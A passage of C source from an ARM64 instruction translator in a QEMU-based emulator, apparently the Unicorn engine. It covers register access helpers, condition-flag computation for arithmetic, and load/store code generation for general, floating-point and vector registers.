DISAS_NORETURN; } static inline bool use_goto_tb(DisasContext *s, int n, uint64_t dest) { struct uc_struct *uc = s->uc; /* No direct tb linking with singlestep (either QEMU's or the ARM * debug architecture kind) or deterministic io */ if (s->base.singlestep_enabled || s->ss_active || (tb_cflags(s->base.tb) & CF_LAST_IO)) { return false; } /* Only link tbs from inside the same guest page */ if ((s->base.tb->pc & TARGET_PAGE_MASK) != (dest & TARGET_PAGE_MASK)) { return false; } return true; } static inline void gen_goto_tb(DisasContext *s, int n, uint64_t dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TranslationBlock *tb; tb = s->base.tb; if (use_goto_tb(s, n, dest)) { tcg_gen_goto_tb(tcg_ctx, n); gen_a64_set_pc_im(tcg_ctx, dest); tcg_gen_exit_tb(tcg_ctx, tb, n); s->base.is_jmp = DISAS_NORETURN; } else { gen_a64_set_pc_im(tcg_ctx, dest); if (s->ss_active) { gen_step_complete_exception(s); } else if (s->base.singlestep_enabled) { gen_exception_internal(tcg_ctx, EXCP_DEBUG); } else { tcg_gen_lookup_and_goto_ptr(tcg_ctx); s->base.is_jmp = DISAS_NORETURN; } } } void unallocated_encoding(DisasContext *s) { /* Unallocated and reserved encodings are uncategorized */ gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_uncategorized(), default_exception_el(s)); } static void init_tmp_a64_array(DisasContext *s) { #ifdef CONFIG_DEBUG_TCG memset(s->tmp_a64, 0, sizeof(s->tmp_a64)); #endif s->tmp_a64_count = 0; } static void free_tmp_a64(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int i; for (i = 0; i < s->tmp_a64_count; i++) { tcg_temp_free_i64(tcg_ctx, s->tmp_a64[i]); } init_tmp_a64_array(s); } TCGv_i64 new_tmp_a64(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; assert(s->tmp_a64_count < TMP_A64_MAX); return s->tmp_a64[s->tmp_a64_count++] = tcg_temp_new_i64(tcg_ctx); } TCGv_i64 new_tmp_a64_zero(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t = new_tmp_a64(s); tcg_gen_movi_i64(tcg_ctx, t, 0); return t; } /* * Register access functions * * These functions are used for directly accessing a register in where * changes to the final register value are likely to be made. If you * need to use a register for temporary calculation (e.g. index type * operations) use the read_* form. * * B1.2.1 Register mappings * * In instruction register encoding 31 can refer to ZR (zero register) or * the SP (stack pointer) depending on context. In QEMU's case we map SP * to cpu_X[31] and ZR accesses to a temporary which can be discarded. * This is the point of the _sp forms. */ TCGv_i64 cpu_reg(DisasContext *s, int reg) { if (reg == 31) { return new_tmp_a64_zero(s); } else { return s->uc->tcg_ctx->cpu_X[reg]; } } /* register access for when 31 == SP */ TCGv_i64 cpu_reg_sp(DisasContext *s, int reg) { return s->uc->tcg_ctx->cpu_X[reg]; } /* read a cpu register in 32bit/64bit mode. Returns a TCGv_i64 * representing the register contents. This TCGv is an auto-freed * temporary so it need not be explicitly freed, and may be modified. */ TCGv_i64 read_cpu_reg(DisasContext *s, int reg, int sf) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 v = new_tmp_a64(s); if (reg != 31) { if (sf) { tcg_gen_mov_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); } else { tcg_gen_ext32u_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); } } else { tcg_gen_movi_i64(tcg_ctx, v, 0); } return v; } TCGv_i64 read_cpu_reg_sp(DisasContext *s, int reg, int sf) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 v = new_tmp_a64(s); if (sf) { tcg_gen_mov_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); } else { tcg_gen_ext32u_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); } return v; } /* Return the offset into CPUARMState of a slice (from * the least significant end) of FP register Qn (ie * Dn, Sn, Hn or Bn). * (Note that this is not the same mapping as for A32; see cpu.h) */ static inline int fp_reg_offset(DisasContext *s, int regno, MemOp size) { return vec_reg_offset(s, regno, 0, size); } /* Offset of the high half of the 128 bit vector Qn */ static inline int fp_reg_hi_offset(DisasContext *s, int regno) { return vec_reg_offset(s, regno, 1, MO_64); } /* Convenience accessors for reading and writing single and double * FP registers. Writing clears the upper parts of the associated * 128 bit vector register, as required by the architecture. * Note that unlike the GP register accessors, the values returned * by the read functions must be manually freed. */ static TCGv_i64 read_fp_dreg(DisasContext *s, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 v = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_64)); return v; } static TCGv_i32 read_fp_sreg(DisasContext *s, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 v = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_32)); return v; } static TCGv_i32 read_fp_hreg(DisasContext *s, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 v = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld16u_i32(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_16)); return v; } /* Clear the bits above an N-bit vector, for N = (is_q ? 128 : 64). * If SVE is not enabled, then there are only 128 bits in the vector. */ static void clear_vec_high(DisasContext *s, bool is_q, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned ofs = fp_reg_offset(s, rd, MO_64); unsigned vsz = vec_full_reg_size(s); if (!is_q) { TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_st_i64(tcg_ctx, tcg_zero, tcg_ctx->cpu_env, ofs + 8); tcg_temp_free_i64(tcg_ctx, tcg_zero); } if (vsz > 16) { tcg_gen_gvec_dup8i(tcg_ctx, ofs + 16, vsz - 16, vsz - 16, 0); } } void write_fp_dreg(DisasContext *s, int reg, TCGv_i64 v) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned ofs = fp_reg_offset(s, reg, MO_64); tcg_gen_st_i64(tcg_ctx, v, tcg_ctx->cpu_env, ofs); clear_vec_high(s, false, reg); } static void write_fp_sreg(DisasContext *s, int reg, TCGv_i32 v) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, tmp, v); write_fp_dreg(s, reg, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } TCGv_ptr get_fpstatus_ptr(TCGContext *tcg_ctx, bool is_f16) { TCGv_ptr statusptr = tcg_temp_new_ptr(tcg_ctx); int offset; /* In A64 all instructions (both FP and Neon) use the FPCR; there * is no equivalent of the A32 Neon "standard FPSCR value". * However half-precision operations operate under a different * FZ16 flag and use vfp.fp_status_f16 instead of vfp.fp_status. */ if (is_f16) { offset = offsetof(CPUARMState, vfp.fp_status_f16); } else { offset = offsetof(CPUARMState, vfp.fp_status); } tcg_gen_addi_ptr(tcg_ctx, statusptr, tcg_ctx->cpu_env, offset); return statusptr; } /* Expand a 2-operand AdvSIMD vector operation using an expander function. */ static void gen_gvec_fn2(DisasContext *s, bool is_q, int rd, int rn, GVecGen2Fn *gvec_fn, int vece) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gvec_fn(tcg_ctx, vece, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), is_q ? 16 : 8, vec_full_reg_size(s)); } /* Expand a 2-operand + immediate AdvSIMD vector operation using * an expander function. */ static void gen_gvec_fn2i(DisasContext *s, bool is_q, int rd, int rn, int64_t imm, GVecGen2iFn *gvec_fn, int vece) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gvec_fn(tcg_ctx, vece, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), imm, is_q ? 16 : 8, vec_full_reg_size(s)); } /* Expand a 3-operand AdvSIMD vector operation using an expander function. */ static void gen_gvec_fn3(DisasContext *s, bool is_q, int rd, int rn, int rm, GVecGen3Fn *gvec_fn, int vece) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gvec_fn(tcg_ctx, vece, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s)); } /* Expand a 4-operand AdvSIMD vector operation using an expander function. */ static void gen_gvec_fn4(DisasContext *s, bool is_q, int rd, int rn, int rm, int rx, GVecGen4Fn *gvec_fn, int vece) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gvec_fn(tcg_ctx, vece, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), vec_full_reg_offset(s, rx), is_q ? 16 : 8, vec_full_reg_size(s)); } /* Expand a 2-operand + immediate AdvSIMD vector operation using * an op descriptor. */ static void gen_gvec_op2i(DisasContext *s, bool is_q, int rd, int rn, int64_t imm, const GVecGen2i *gvec_op) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_gvec_2i(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), is_q ? 16 : 8, vec_full_reg_size(s), imm, gvec_op); } /* Expand a 3-operand AdvSIMD vector operation using an op descriptor. */ static void gen_gvec_op3(DisasContext *s, bool is_q, int rd, int rn, int rm, const GVecGen3 *gvec_op) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_gvec_3(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s), gvec_op); } /* Expand a 3-operand operation using an out-of-line helper. */ static void gen_gvec_op3_ool(DisasContext *s, bool is_q, int rd, int rn, int rm, int data, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s), data, fn); } /* Expand a 3-operand + env pointer operation using * an out-of-line helper. */ static void gen_gvec_op3_env(DisasContext *s, bool is_q, int rd, int rn, int rm, gen_helper_gvec_3_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), tcg_ctx->cpu_env, is_q ? 16 : 8, vec_full_reg_size(s), 0, fn); } /* Expand a 3-operand + fpstatus pointer + simd data value operation using * an out-of-line helper. */ static void gen_gvec_op3_fpst(DisasContext *s, bool is_q, int rd, int rn, int rm, bool is_fp16, int data, gen_helper_gvec_3_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, is_fp16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), fpst, is_q ? 16 : 8, vec_full_reg_size(s), data, fn); tcg_temp_free_ptr(tcg_ctx, fpst); } /* Set ZF and NF based on a 64 bit result. This is alas fiddlier * than the 32 bit equivalent. */ static inline void gen_set_NZ64(TCGContext *tcg_ctx, TCGv_i64 result) { tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF, result); tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); } /* Set NZCV as for a logical operation: NZ as per result, CV cleared. */ static inline void gen_logic_CC(TCGContext *tcg_ctx, int sf, TCGv_i64 result) { if (sf) { gen_set_NZ64(tcg_ctx, result); } else { tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_ZF, result); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_ZF); } tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); } /* dest = T0 + T1; compute C, N, V and Z flags */ static void gen_add_CC(TCGContext *tcg_ctx, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) { if (sf) { TCGv_i64 result, flag, tmp; result = tcg_temp_new_i64(tcg_ctx); flag = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, tmp, 0); tcg_gen_add2_i64(tcg_ctx, result, flag, t0, tmp, t1, tmp); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, flag); gen_set_NZ64(tcg_ctx, result); tcg_gen_xor_i64(tcg_ctx, flag, result, t0); tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); tcg_gen_andc_i64(tcg_ctx, flag, flag, tmp); tcg_temp_free_i64(tcg_ctx, tmp); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, flag); tcg_gen_mov_i64(tcg_ctx, dest, result); tcg_temp_free_i64(tcg_ctx, result); tcg_temp_free_i64(tcg_ctx, flag); } else { /* 32 bit arithmetic */ TCGv_i32 t0_32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1_32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, 0); tcg_gen_extrl_i64_i32(tcg_ctx, t0_32, t0); tcg_gen_extrl_i64_i32(tcg_ctx, t1_32, t1); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0_32, tmp, t1_32, tmp); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0_32); tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, t0_32); tcg_temp_free_i32(tcg_ctx, t1_32); } } /* dest = T0 - T1; compute C, N, V and Z flags */ static void gen_sub_CC(TCGContext *tcg_ctx, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) { if (sf) { /* 64 bit arithmetic */ TCGv_i64 result, flag, tmp; result = tcg_temp_new_i64(tcg_ctx); flag = tcg_temp_new_i64(tcg_ctx); tcg_gen_sub_i64(tcg_ctx, result, t0, t1); gen_set_NZ64(tcg_ctx, result); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_GEU, flag, t0, t1); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, flag); tcg_gen_xor_i64(tcg_ctx, flag, result, t0); tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); tcg_gen_and_i64(tcg_ctx, flag, flag, tmp); tcg_temp_free_i64(tcg_ctx, tmp); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, flag); tcg_gen_mov_i64(tcg_ctx, dest, result); tcg_temp_free_i64(tcg_ctx, flag); tcg_temp_free_i64(tcg_ctx, result); } else { /* 32 bit arithmetic */ TCGv_i32 t0_32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1_32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tmp; tcg_gen_extrl_i64_i32(tcg_ctx, t0_32, t0); tcg_gen_extrl_i64_i32(tcg_ctx, t1_32, t1); tcg_gen_sub_i32(tcg_ctx, tcg_ctx->cpu_NF, t0_32, t1_32); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_CF, t0_32, t1_32); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0_32); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); tcg_temp_free_i32(tcg_ctx, t0_32); tcg_temp_free_i32(tcg_ctx, t1_32); tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); } } /* dest = T0 + T1 + CF; do not compute flags. */ static void gen_adc(TCGContext *tcg_ctx, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) { TCGv_i64 flag = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, flag, tcg_ctx->cpu_CF); tcg_gen_add_i64(tcg_ctx, dest, t0, t1); tcg_gen_add_i64(tcg_ctx, dest, dest, flag); tcg_temp_free_i64(tcg_ctx, flag); if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, dest, dest); } } /* dest = T0 + T1 + CF; compute C, N, V and Z flags. */ static void gen_adc_CC(TCGContext *tcg_ctx, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) { if (sf) { TCGv_i64 result, cf_64, vf_64, tmp; result = tcg_temp_new_i64(tcg_ctx); cf_64 = tcg_temp_new_i64(tcg_ctx); vf_64 = tcg_temp_new_i64(tcg_ctx); tmp = tcg_const_i64(tcg_ctx, 0); tcg_gen_extu_i32_i64(tcg_ctx, cf_64, tcg_ctx->cpu_CF); tcg_gen_add2_i64(tcg_ctx, result, cf_64, t0, tmp, cf_64, tmp); tcg_gen_add2_i64(tcg_ctx, result, cf_64, result, cf_64, t1, tmp); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, cf_64); gen_set_NZ64(tcg_ctx, result); tcg_gen_xor_i64(tcg_ctx, vf_64, result, t0); tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); tcg_gen_andc_i64(tcg_ctx, vf_64, vf_64, tmp); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, vf_64); tcg_gen_mov_i64(tcg_ctx, dest, result); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, vf_64); tcg_temp_free_i64(tcg_ctx, cf_64); tcg_temp_free_i64(tcg_ctx, result); } else { TCGv_i32 t0_32, t1_32, tmp; t0_32 = tcg_temp_new_i32(tcg_ctx); t1_32 = tcg_temp_new_i32(tcg_ctx); tmp = tcg_const_i32(tcg_ctx, 0); tcg_gen_extrl_i64_i32(tcg_ctx, t0_32, t0); tcg_gen_extrl_i64_i32(tcg_ctx, t1_32, t1); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0_32, tmp, tcg_ctx->cpu_CF, tmp); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t1_32, tmp); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0_32); tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, t1_32); tcg_temp_free_i32(tcg_ctx, t0_32); } } /* * Load/Store generators */ /* * Store from GPR register to memory. */ static void do_gpr_st_memidx(DisasContext *s, TCGv_i64 source, TCGv_i64 tcg_addr, int size, int memidx, bool iss_valid, unsigned int iss_srt, bool iss_sf, bool iss_ar) { TCGContext *tcg_ctx = s->uc->tcg_ctx; g_assert(size <= 3); tcg_gen_qemu_st_i64(tcg_ctx, source, tcg_addr, memidx, s->be_data + size); if (iss_valid) { uint32_t syn; syn = syn_data_abort_with_iss(0, size, false, iss_srt, iss_sf, iss_ar, 0, 0, 0, 0, 0, false); disas_set_insn_syndrome(s, syn); } } static void do_gpr_st(DisasContext *s, TCGv_i64 source, TCGv_i64 tcg_addr, int size, bool iss_valid, unsigned int iss_srt, bool iss_sf, bool iss_ar) { do_gpr_st_memidx(s, source, tcg_addr, size, get_mem_index(s), iss_valid, iss_srt, iss_sf, iss_ar); } /* * Load from memory to GPR register */ static void do_gpr_ld_memidx(DisasContext *s, TCGv_i64 dest, TCGv_i64 tcg_addr, int size, bool is_signed, bool extend, int memidx, bool iss_valid, unsigned int iss_srt, bool iss_sf, bool iss_ar) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp memop = s->be_data + size; g_assert(size <= 3); if (is_signed) { memop += MO_SIGN; } tcg_gen_qemu_ld_i64(tcg_ctx, dest, tcg_addr, memidx, memop); if (extend && is_signed) { g_assert(size < 3); tcg_gen_ext32u_i64(tcg_ctx, dest, dest); } if (iss_valid) { uint32_t syn; syn = syn_data_abort_with_iss(0, size, is_signed, iss_srt, iss_sf, iss_ar, 0, 0, 0, 0, 0, false); disas_set_insn_syndrome(s, syn); } } static void do_gpr_ld(DisasContext *s, TCGv_i64 dest, TCGv_i64 tcg_addr, int size, bool is_signed, bool extend, bool iss_valid, unsigned int iss_srt, bool iss_sf, bool iss_ar) { do_gpr_ld_memidx(s, dest, tcg_addr, size, is_signed, extend, get_mem_index(s), iss_valid, iss_srt, iss_sf, iss_ar); } /* * Store from FP register to memory */ static void do_fp_st(DisasContext *s, int srcidx, TCGv_i64 tcg_addr, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* This writes the bottom N bits of a 128 bit wide vector to memory */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_offset(s, srcidx, MO_64)); if (size < 4) { tcg_gen_qemu_st_i64(tcg_ctx, tmp, tcg_addr, get_mem_index(s), s->be_data + size); } else { bool be = s->be_data == MO_BE; TCGv_i64 tcg_hiaddr = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, tcg_hiaddr, tcg_addr, 8); tcg_gen_qemu_st_i64(tcg_ctx, tmp, be ? tcg_hiaddr : tcg_addr, get_mem_index(s), s->be_data | MO_Q); tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_hi_offset(s, srcidx)); tcg_gen_qemu_st_i64(tcg_ctx, tmp, be ? tcg_addr : tcg_hiaddr, get_mem_index(s), s->be_data | MO_Q); tcg_temp_free_i64(tcg_ctx, tcg_hiaddr); } tcg_temp_free_i64(tcg_ctx, tmp); } /* * Load from memory to FP register */ static void do_fp_ld(DisasContext *s, int destidx, TCGv_i64 tcg_addr, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* This always zero-extends and writes to a full 128 bit wide vector */ TCGv_i64 tmplo = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tmphi; if (size < 4) { MemOp memop = s->be_data + size; tmphi = tcg_const_i64(tcg_ctx, 0); tcg_gen_qemu_ld_i64(tcg_ctx, tmplo, tcg_addr, get_mem_index(s), memop); } else { bool be = s->be_data == MO_BE; TCGv_i64 tcg_hiaddr; tmphi = tcg_temp_new_i64(tcg_ctx); tcg_hiaddr = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, tcg_hiaddr, tcg_addr, 8); tcg_gen_qemu_ld_i64(tcg_ctx, tmplo, be ? tcg_hiaddr : tcg_addr, get_mem_index(s), s->be_data | MO_Q); tcg_gen_qemu_ld_i64(tcg_ctx, tmphi, be ? tcg_addr : tcg_hiaddr, get_mem_index(s), s->be_data | MO_Q); tcg_temp_free_i64(tcg_ctx, tcg_hiaddr); } tcg_gen_st_i64(tcg_ctx, tmplo, tcg_ctx->cpu_env, fp_reg_offset(s, destidx, MO_64)); tcg_gen_st_i64(tcg_ctx, tmphi, tcg_ctx->cpu_env, fp_reg_hi_offset(s, destidx)); tcg_temp_free_i64(tcg_ctx, tmplo); tcg_temp_free_i64(tcg_ctx, tmphi); clear_vec_high(s, true, destidx); } /* * Vector load/store helpers. * * The principal difference between this and a FP load is that we don't * zero extend as we are filling a partial chunk of the vector register. * These functions don't support 128 bit loads/stores, which would be * normal load/store operations. * * The _i32 versions are useful when operating on 32 bit quantities * (eg for floating point single or using Neon helper functions). */ /* Get value of an element within a vector register */ static void read_vec_element(DisasContext *s, TCGv_i64 tcg_dest, int srcidx, int element, MemOp memop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int vect_off = vec_reg_offset(s, srcidx, element, memop & MO_SIZE); switch (memop) { case MO_8: tcg_gen_ld8u_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_16: tcg_gen_ld16u_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_32: tcg_gen_ld32u_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_8|MO_SIGN: tcg_gen_ld8s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_16|MO_SIGN: tcg_gen_ld16s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_32|MO_SIGN: tcg_gen_ld32s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_64: case MO_64|MO_SIGN: tcg_gen_ld_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; default: g_assert_not_reached(); } } static void read_vec_element_i32(DisasContext *s, TCGv_i32 tcg_dest, int srcidx, int element, MemOp memop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int vect_off = vec_reg_offset(s, srcidx, element, memop & MO_SIZE); switch (memop) { case MO_8: tcg_gen_ld8u_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_16: tcg_gen_ld16u_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_8|MO_SIGN: tcg_gen_ld8s_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_16|MO_SIGN: tcg_gen_ld16s_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_32: case MO_32|MO_SIGN: tcg_gen_ld_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; default: g_assert_not_reached(); } } /* Set value of an element within a vector register */ static void write_vec_element(DisasContext *s, TCGv_i64 tcg_src, int destidx, int element, MemOp memop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int vect_off = vec_reg_offset(s, destidx, element, memop & MO_SIZE); switch (memop) { case MO_8: tcg_gen_st8_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; case MO_16: tcg_gen_st16_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; case MO_32: tcg_gen_st32_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; case MO_64: tcg_gen_st_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; default: g_assert_not_reached(); } } static void write_vec_element_i32(DisasContext *s, TCGv_i32 tcg_src, int destidx, int element, MemOp memop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int vect_off = vec_reg_offset(s, destidx, element, memop & MO_SIZE); switch (memop) { case MO_8: tcg_gen_st8_i32(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; case MO_16: tcg_gen_st16_i32(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; case MO_32: tcg_gen_st_i32(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; default: g_assert_not_reached(); } } /* Store from vector register to memory */ static void do_vec_st(DisasContext *s, int srcidx, int element, TCGv_i64 tcg_addr, int size, MemOp endian) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_tmp, srcidx, element, size); tcg_gen_qemu_st_i64(tcg_ctx, tcg_tmp, tcg_addr, get_mem_index(s), endian | size); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } /* Load from memory to vector register */ static void do_vec_ld(DisasContext *s, int destidx, int element, TCGv_i64 tcg_addr, int size, MemOp endian) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_tmp, tcg_addr, get_mem_index(s), endian | size); write_vec_element(s, tcg_tmp, destidx, element, size); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } /* Check that FP/Neon access is enabled. If it is, return * true. If not, emit code to generate an appropriate exception, * and return false; the caller should not emit any code for * the instruction. Note that this check must happen after all * unallocated-encoding checks (otherwise the syndrome information * for the resulting exception will be incorrect). */ static inline bool fp_access_check(DisasContext *s) { assert(!s->fp_access_checked); s->fp_access_checked = true; if (!s->fp_excp_el) { return true; } gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_fp_access_trap(1, 0xe, false), s->fp_excp_el); return false; } /* Check that SVE access is enabled. If it is, return true. * If not, emit code to generate an appropriate exception and return false. */ bool sve_access_check(DisasContext *s) { if (s->sve_excp_el) { gen_exception_insn(s, s->pc_curr, 